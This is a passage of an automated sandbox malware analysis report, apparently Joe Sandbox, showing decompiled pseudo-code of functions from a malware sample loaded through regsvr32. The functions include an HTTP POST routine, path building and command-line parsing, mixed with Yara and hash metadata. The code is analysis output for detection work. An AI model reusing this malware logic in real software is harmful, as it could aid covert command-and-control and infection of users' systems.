										E0499F6EC(_t116);
									}
									_t117 = E04999DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x49af838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0499A43D(_t193), _a4, _a8);
									E04998B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0499A065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E04998D6D( &_v20, 0, _t122);
										_t127 =  *0x49af838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E04999F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x49af838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x49af838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x49af838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x49af838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x49af838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x49af838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x49af838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x49af838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x49af838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                                              0x0499f7b4
                                                                                                                                                                                              0x0499f7c0
                                                                                                                                                                                              0x0499f7c7
                                                                                                                                                                                              0x0499f7d4
                                                                                                                                                                                              0x0499f7d7
                                                                                                                                                                                              0x0499f7e8
                                                                                                                                                                                              0x0499f7ff
                                                                                                                                                                                              0x0499f80c
                                                                                                                                                                                              0x0499f819
                                                                                                                                                                                              0x0499f826
                                                                                                                                                                                              0x0499f829
                                                                                                                                                                                              0x0499f82e
                                                                                                                                                                                              0x0499f833
                                                                                                                                                                                              0x0499f835
                                                                                                                                                                                              0x0499f83d
                                                                                                                                                                                              0x0499f845
                                                                                                                                                                                              0x0499f84c
                                                                                                                                                                                              0x0499f858
                                                                                                                                                                                              0x0499f85b
                                                                                                                                                                                              0x0499f869
                                                                                                                                                                                              0x0499f86c
                                                                                                                                                                                              0x0499f872
                                                                                                                                                                                              0x0499f873
                                                                                                                                                                                              0x0499f875
                                                                                                                                                                                              0x0499f87e
                                                                                                                                                                                              0x0499f87f
                                                                                                                                                                                              0x0499f884
                                                                                                                                                                                              0x0499f88a
                                                                                                                                                                                              0x0499f894
                                                                                                                                                                                              0x0499f894
                                                                                                                                                                                              0x0499f896
                                                                                                                                                                                              0x0499f89b
                                                                                                                                                                                              0x0499f8a5
                                                                                                                                                                                              0x0499f8b0
                                                                                                                                                                                              0x0499f8b9
                                                                                                                                                                                              0x0499f8bb
                                                                                                                                                                                              0x0499f8bd
                                                                                                                                                                                              0x0499f8cc
                                                                                                                                                                                              0x0499f8e3
                                                                                                                                                                                              0x0499f8e9
                                                                                                                                                                                              0x0499f8ec
                                                                                                                                                                                              0x0499f8f0
                                                                                                                                                                                              0x0499f8f2
                                                                                                                                                                                              0x0499f8f7
                                                                                                                                                                                              0x0499f8f7
                                                                                                                                                                                              0x0499f8fc
                                                                                                                                                                                              0x0499f8fe
                                                                                                                                                                                              0x0499f914
                                                                                                                                                                                              0x0499f918
                                                                                                                                                                                              0x0499f91d
                                                                                                                                                                                              0x0499f91f
                                                                                                                                                                                              0x0499f91f
                                                                                                                                                                                              0x0499f933
                                                                                                                                                                                              0x0499f93e
                                                                                                                                                                                              0x0499f941
                                                                                                                                                                                              0x0499f944
                                                                                                                                                                                              0x0499f947
                                                                                                                                                                                              0x0499f94c
                                                                                                                                                                                              0x0499f951
                                                                                                                                                                                              0x0499f951
                                                                                                                                                                                              0x0499f954
                                                                                                                                                                                              0x0499f956
                                                                                                                                                                                              0x0499f97c
                                                                                                                                                                                              0x0499f980
                                                                                                                                                                                              0x0499f984
                                                                                                                                                                                              0x0499f984
                                                                                                                                                                                              0x0499f98e
                                                                                                                                                                                              0x0499f996
                                                                                                                                                                                              0x0499f99b
                                                                                                                                                                                              0x0499f9a6
                                                                                                                                                                                              0x0499f9ac
                                                                                                                                                                                              0x0499f9b6
                                                                                                                                                                                              0x0499f9b9
                                                                                                                                                                                              0x0499f9be
                                                                                                                                                                                              0x0499f9c2
                                                                                                                                                                                              0x0499f9c7
                                                                                                                                                                                              0x0499f9c7
                                                                                                                                                                                              0x0499f9cc
                                                                                                                                                                                              0x0499f9d0
                                                                                                                                                                                              0x0499fa1b
                                                                                                                                                                                              0x0499fa1d
                                                                                                                                                                                              0x0499fa20
                                                                                                                                                                                              0x0499fa28
                                                                                                                                                                                              0x0499fa2c
                                                                                                                                                                                              0x0499fa2f
                                                                                                                                                                                              0x0499fa41
                                                                                                                                                                                              0x0499fa4c
                                                                                                                                                                                              0x0499fa4e
                                                                                                                                                                                              0x0499fa62
                                                                                                                                                                                              0x0499fa67
                                                                                                                                                                                              0x0499fa6c
                                                                                                                                                                                              0x0499faa1
                                                                                                                                                                                              0x0499faa6
                                                                                                                                                                                              0x0499faab
                                                                                                                                                                                              0x0499faad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499faad
                                                                                                                                                                                              0x0499fa70
                                                                                                                                                                                              0x0499fa73
                                                                                                                                                                                              0x0499fa73
                                                                                                                                                                                              0x0499fa79
                                                                                                                                                                                              0x0499fa7c
                                                                                                                                                                                              0x0499fa7f
                                                                                                                                                                                              0x0499fa7f
                                                                                                                                                                                              0x0499fa81
                                                                                                                                                                                              0x0499fa83
                                                                                                                                                                                              0x0499fa89
                                                                                                                                                                                              0x0499fa89
                                                                                                                                                                                              0x0499fa8c
                                                                                                                                                                                              0x0499fa8e
                                                                                                                                                                                              0x0499fa90
                                                                                                                                                                                              0x0499fa97
                                                                                                                                                                                              0x0499fa97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499fa9a
                                                                                                                                                                                              0x0499fa50
                                                                                                                                                                                              0x0499fa56
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499f9d2
                                                                                                                                                                                              0x0499f9d2
                                                                                                                                                                                              0x0499f9d8
                                                                                                                                                                                              0x0499f9de
                                                                                                                                                                                              0x0499f9e1
                                                                                                                                                                                              0x0499f9e6
                                                                                                                                                                                              0x0499f9eb
                                                                                                                                                                                              0x0499f9ee
                                                                                                                                                                                              0x0499f9f3
                                                                                                                                                                                              0x0499f9f3
                                                                                                                                                                                              0x0499f9f6
                                                                                                                                                                                              0x0499f9f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499f9f9
                                                                                                                                                                                              0x0499f958
                                                                                                                                                                                              0x0499f958
                                                                                                                                                                                              0x0499f95e
                                                                                                                                                                                              0x0499f964
                                                                                                                                                                                              0x0499f967
                                                                                                                                                                                              0x0499f96c
                                                                                                                                                                                              0x0499f96f
                                                                                                                                                                                              0x0499f972
                                                                                                                                                                                              0x0499f974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499f974
                                                                                                                                                                                              0x0499f900
                                                                                                                                                                                              0x0499f900
                                                                                                                                                                                              0x0499f906
                                                                                                                                                                                              0x0499f90c
                                                                                                                                                                                              0x0499f9fc
                                                                                                                                                                                              0x0499f9fc
                                                                                                                                                                                              0x0499f9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499f9fc
                                                                                                                                                                                              0x0499f8fe
                                                                                                                                                                                              0x0499f8bf
                                                                                                                                                                                              0x0499f9fe
                                                                                                                                                                                              0x0499fa01
                                                                                                                                                                                              0x0499fa03
                                                                                                                                                                                              0x0499fa06
                                                                                                                                                                                              0x0499fa09
                                                                                                                                                                                              0x0499fa09
                                                                                                                                                                                              0x0499fa12
                                                                                                                                                                                              0x0499fa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499fa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499fa18
                                                                                                                                                                                              0x0499f88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 0499F7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 0499F7E8
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0499F8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 6a5c878c4d4c0fe7912dc24f0836562db789adf90d030190b8467c361d7cdc3a
                                                                                                                                                                                              • Instruction ID: 2c86715de796272c0054168c23d306df8695a4b877fe9b77e04ab91d9f83fe72
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5c878c4d4c0fe7912dc24f0836562db789adf90d030190b8467c361d7cdc3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31A17075E00218AFDF10DFA8D888AAEBBF8EF48314F114579E905E7254DB34AE45CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A1464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 7951cecd9024370b76e2f1f7ecbfbed08fd17d758c06ad801465e8c740c08a49
                                                                                                                                                                                              • Instruction ID: b5fead453275ca7c18f2a6caee51b49003bc1fa8b3b9772ebb96f82909028875
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7951cecd9024370b76e2f1f7ecbfbed08fd17d758c06ad801465e8c740c08a49
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5E15CB1A0020ABBEF119F64DC46EAF3BADEF84744F048439FD1596141E631EA719BE1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049950B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E049950B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x49af81c; // 0x4bdfbe8
					_t5 = _t108 + 0x110; // 0x4be16b8
					_t110 =  *0x49af820; // 0x4bdfaa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E0499C9F4(_t173) != 0) {
					L4:
					_t56 = E0499C6CE();
					_push(_t113);
					_v592 = _t56;
					E0499C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E04995072( &_v580,  &_v580, _t190);
					_t126 = E0499E2C5( &_v580, E0499A43D( &_v580), 0);
					E0499C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E0499317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x49ac9a0);
						_t115 = E04999A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x49af81c; // 0x4bdfbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E049998BD(_v600);
								_t130 = _t115;
								 *0x49af8d8 = _t66;
								 *0x49af8d0 = E049998BD(_t130);
								L17:
								_push(_t130);
								_t174 = E0499A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x49ac9f2);
								_t163 = 0xe;
								E0499AAA3(_t163, _t192);
								E0499AADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E0499AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E0499B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E0499B025(_t166, _t192);
								}
								_t76 = E0499A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E0499AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x49af81c; // 0x4bdfbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E049A0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x49af81c; // 0x4bdfbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E0499F0DE(_t169);
										}
										E0499584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x49af81c; // 0x4bdfbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E0499109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E04998BAF( &_v596);
												 *_t187 = 0x49ac9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x49ac9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x4bdfe10
									_t142 = _t40;
									L25:
									_t78 = E04995AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x49af81c; // 0x4bdfbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E0499D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x49af818; // 0x4bdf8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x49af818; // 0x4bdf8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E04998BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E04998BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E0499F1F6(_v600, _t161);
							goto L12;
						}
						E0499F1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E04993097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E04995F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                                              0x049950b3
                                                                                                                                                                                              0x049950c0
                                                                                                                                                                                              0x049950cb
                                                                                                                                                                                              0x049950d0
                                                                                                                                                                                              0x049950d2
                                                                                                                                                                                              0x049950d5
                                                                                                                                                                                              0x049950da
                                                                                                                                                                                              0x049950df
                                                                                                                                                                                              0x049950e2
                                                                                                                                                                                              0x049950ec
                                                                                                                                                                                              0x049950ee
                                                                                                                                                                                              0x049950f3
                                                                                                                                                                                              0x049950fb
                                                                                                                                                                                              0x04995104
                                                                                                                                                                                              0x04995104
                                                                                                                                                                                              0x04995111
                                                                                                                                                                                              0x0499512c
                                                                                                                                                                                              0x0499512e
                                                                                                                                                                                              0x04995133
                                                                                                                                                                                              0x04995138
                                                                                                                                                                                              0x0499513e
                                                                                                                                                                                              0x0499514d
                                                                                                                                                                                              0x0499516c
                                                                                                                                                                                              0x0499516e
                                                                                                                                                                                              0x04995173
                                                                                                                                                                                              0x04995174
                                                                                                                                                                                              0x0499517a
                                                                                                                                                                                              0x0499517f
                                                                                                                                                                                              0x04995186
                                                                                                                                                                                              0x04995190
                                                                                                                                                                                              0x04995192
                                                                                                                                                                                              0x04995193
                                                                                                                                                                                              0x0499519e
                                                                                                                                                                                              0x049951a0
                                                                                                                                                                                              0x049951a3
                                                                                                                                                                                              0x049951a8
                                                                                                                                                                                              0x049951af
                                                                                                                                                                                              0x049951d3
                                                                                                                                                                                              0x049951d3
                                                                                                                                                                                              0x049951d8
                                                                                                                                                                                              0x0499523f
                                                                                                                                                                                              0x04995244
                                                                                                                                                                                              0x04995246
                                                                                                                                                                                              0x04995250
                                                                                                                                                                                              0x04995255
                                                                                                                                                                                              0x04995255
                                                                                                                                                                                              0x0499526f
                                                                                                                                                                                              0x04995271
                                                                                                                                                                                              0x04995274
                                                                                                                                                                                              0x04995276
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499527c
                                                                                                                                                                                              0x04995283
                                                                                                                                                                                              0x04995286
                                                                                                                                                                                              0x0499528f
                                                                                                                                                                                              0x04995294
                                                                                                                                                                                              0x0499529a
                                                                                                                                                                                              0x0499529f
                                                                                                                                                                                              0x049952a4
                                                                                                                                                                                              0x049952a8
                                                                                                                                                                                              0x049952aa
                                                                                                                                                                                              0x049952ae
                                                                                                                                                                                              0x049952ae
                                                                                                                                                                                              0x049952b3
                                                                                                                                                                                              0x049952b6
                                                                                                                                                                                              0x049952b8
                                                                                                                                                                                              0x049952bc
                                                                                                                                                                                              0x049952bc
                                                                                                                                                                                              0x049952c3
                                                                                                                                                                                              0x049952c8
                                                                                                                                                                                              0x049952cc
                                                                                                                                                                                              0x049952cf
                                                                                                                                                                                              0x049952d4
                                                                                                                                                                                              0x049952da
                                                                                                                                                                                              0x049952db
                                                                                                                                                                                              0x04995303
                                                                                                                                                                                              0x04995309
                                                                                                                                                                                              0x04995310
                                                                                                                                                                                              0x0499531f
                                                                                                                                                                                              0x04995324
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995324
                                                                                                                                                                                              0x04995312
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049952dd
                                                                                                                                                                                              0x049952dd
                                                                                                                                                                                              0x049952e2
                                                                                                                                                                                              0x049952e9
                                                                                                                                                                                              0x0499532e
                                                                                                                                                                                              0x0499532e
                                                                                                                                                                                              0x04995335
                                                                                                                                                                                              0x04995339
                                                                                                                                                                                              0x0499533a
                                                                                                                                                                                              0x0499533a
                                                                                                                                                                                              0x04995344
                                                                                                                                                                                              0x04995349
                                                                                                                                                                                              0x0499534c
                                                                                                                                                                                              0x0499534d
                                                                                                                                                                                              0x0499534f
                                                                                                                                                                                              0x04995351
                                                                                                                                                                                              0x04995356
                                                                                                                                                                                              0x0499535d
                                                                                                                                                                                              0x049953a0
                                                                                                                                                                                              0x0499535f
                                                                                                                                                                                              0x04995364
                                                                                                                                                                                              0x0499536c
                                                                                                                                                                                              0x04995370
                                                                                                                                                                                              0x0499537b
                                                                                                                                                                                              0x04995386
                                                                                                                                                                                              0x0499538e
                                                                                                                                                                                              0x04995392
                                                                                                                                                                                              0x0499539a
                                                                                                                                                                                              0x0499539a
                                                                                                                                                                                              0x0499535d
                                                                                                                                                                                              0x049953a6
                                                                                                                                                                                              0x049953a9
                                                                                                                                                                                              0x049953ab
                                                                                                                                                                                              0x049953b1
                                                                                                                                                                                              0x049953b1
                                                                                                                                                                                              0x049953b3
                                                                                                                                                                                              0x049953b3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049953b3
                                                                                                                                                                                              0x049952eb
                                                                                                                                                                                              0x049952eb
                                                                                                                                                                                              0x049952f1
                                                                                                                                                                                              0x049952f3
                                                                                                                                                                                              0x049952f8
                                                                                                                                                                                              0x049952f8
                                                                                                                                                                                              0x049952fa
                                                                                                                                                                                              0x04995329
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995329
                                                                                                                                                                                              0x049952fc
                                                                                                                                                                                              0x0499518a
                                                                                                                                                                                              0x0499518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499518a
                                                                                                                                                                                              0x049952db
                                                                                                                                                                                              0x049951de
                                                                                                                                                                                              0x049951ec
                                                                                                                                                                                              0x049951ff
                                                                                                                                                                                              0x04995204
                                                                                                                                                                                              0x0499520a
                                                                                                                                                                                              0x0499520c
                                                                                                                                                                                              0x04995224
                                                                                                                                                                                              0x04995229
                                                                                                                                                                                              0x04995232
                                                                                                                                                                                              0x04995238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995238
                                                                                                                                                                                              0x04995214
                                                                                                                                                                                              0x0499521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499521d
                                                                                                                                                                                              0x049951b1
                                                                                                                                                                                              0x049951b1
                                                                                                                                                                                              0x049951b7
                                                                                                                                                                                              0x049951b9
                                                                                                                                                                                              0x049951c6
                                                                                                                                                                                              0x049951c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951ca
                                                                                                                                                                                              0x049951ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951ce
                                                                                                                                                                                              0x049951bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951bf
                                                                                                                                                                                              0x04995188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995113
                                                                                                                                                                                              0x0499511e
                                                                                                                                                                                              0x04995124
                                                                                                                                                                                              0x04995126
                                                                                                                                                                                              0x049953b5
                                                                                                                                                                                              0x049953b9
                                                                                                                                                                                              0x049953be
                                                                                                                                                                                              0x049953c0
                                                                                                                                                                                              0x049953c6
                                                                                                                                                                                              0x049953c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: 6cca0415374c8d8c3af9cefef9a4eefc0dc42b2450757c0a9b1e626e7a06e4ab
                                                                                                                                                                                              • Instruction ID: 1c19a6d921f65bb4829aa7ea88694daf54ff84578ab558760680b1ba963753af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cca0415374c8d8c3af9cefef9a4eefc0dc42b2450757c0a9b1e626e7a06e4ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1681CF72704301ABEB15EE28D845B7F77EAEBC5328F15493DE4568B280EB74BC058A91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499DE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E0499DE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x49ac9a0);
						_t36 = E04999A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E04998BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                                              0x0499de2f
                                                                                                                                                                                              0x0499de36
                                                                                                                                                                                              0x0499de39
